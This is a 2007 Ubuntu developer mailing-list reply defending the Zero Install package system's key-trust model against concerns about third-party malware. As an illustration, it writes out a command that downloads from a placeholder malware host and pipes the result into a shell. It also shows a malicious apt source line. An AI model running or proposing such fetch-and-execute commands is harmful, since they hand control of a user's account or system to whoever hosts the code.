On Tue, 09 Jan 2007 22:41:56 +0100, Reinhard Tartler wrote: > "Thomas Leonard" <[EMAIL PROTECTED]> writes: > >> I think you'll find the security model is rather different in Zero Install. >> >> In particular, it should never "break" a user account, since it only >> ever writes to the directories ~/.config/0install.net >> and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything >> else ;-). > > Err, that's fair enough. My concern is rather, that code from > unknown/unauthorized 3rd parties is executed, so the perfect way to > inject trojan or other malware.
Well, here are three possible ways to install malware: - Tell Zero Install to run http://malware.com/malware. Either ignore the warning about the key being unknown, or take the risk that the key isn't trust-worthy even if it's in the database. Result: User account compromised. - Type: $ wget malware.com/malware -O -|sh Result: User account compromised. - Edit /etc/apt/sources.list and add: deb http://malware.com/... Result: Root compromise. As a malware author, why would you use Zero Install instead of one of the other methods? The second one is available to all users and at least as effective. Plus, your victims get no warnings about keys at all that way. Note: I copied that wget example from a real web-page for some genuine software (but I changed the name ;-) - people are really forced to do this kind of thing at the moment! It really depends why someone is trying to install the software: - "This game looks fun!" "Hmm... it's too hard to install." "Let's install a different game from Ubuntu's approved repository instead!" vs - "I need this software to get my work done and Ubuntu doesn't have it." or - "I'll keep trying until it's installed." >>> Furthermore, I have some security concerns (who validates/authorizes a >>> signature from one upstream). >> >> The user installing the software, assisted by a "hints" database of known >> keys. While you can try to protect users from installing malware, at the >> end of the day it *is* their computer, and they have to make the final >> judgement. > > Where do these 'known' keys come from? Who authorizes these keys? Currently, people post them to a public mailing list and I add them. Here's a screenshot showing a typical dialog: http://0install.net/trustbox.png If universe has stricter checks, we could use that keyring too for the hints ("This key is approved by MOTU" / "MOTU has not approved this key - USE AT OWN RISK!"). >> Please let me know if you have any other concerns. > > Well, in ubuntu, the archives key come from the installation media. I > have the concern that it may seem that including 0install could imply > that we 'authorize' other 3rd party software. Do Ubuntu users really need to be "authorised" by you to run software on their own computers? Note that there are no pre-approved keys, just information about where the key was announced. Perhaps we could make the confirmation stronger; something like what you get from "apt-get remove grep"? As always, there's a balance. Make it too easy to install programs and some people will install every stupid toy they see. Make the installer too strict, and people start doing "wget | sh" and not using it at all. > I fear that we'll get bugreports from 3rd party software by users, who > have installed random software via 0install, and that we will not be > able to support them. That's true. How do you deal with this problem with Firefox extensions, Python distutil modules, modified sources.list files and similar? Thanks, -- Dr Thomas Leonard http://rox.sourceforge.net GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1 -- Ubuntu-motu mailing list [email protected] Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
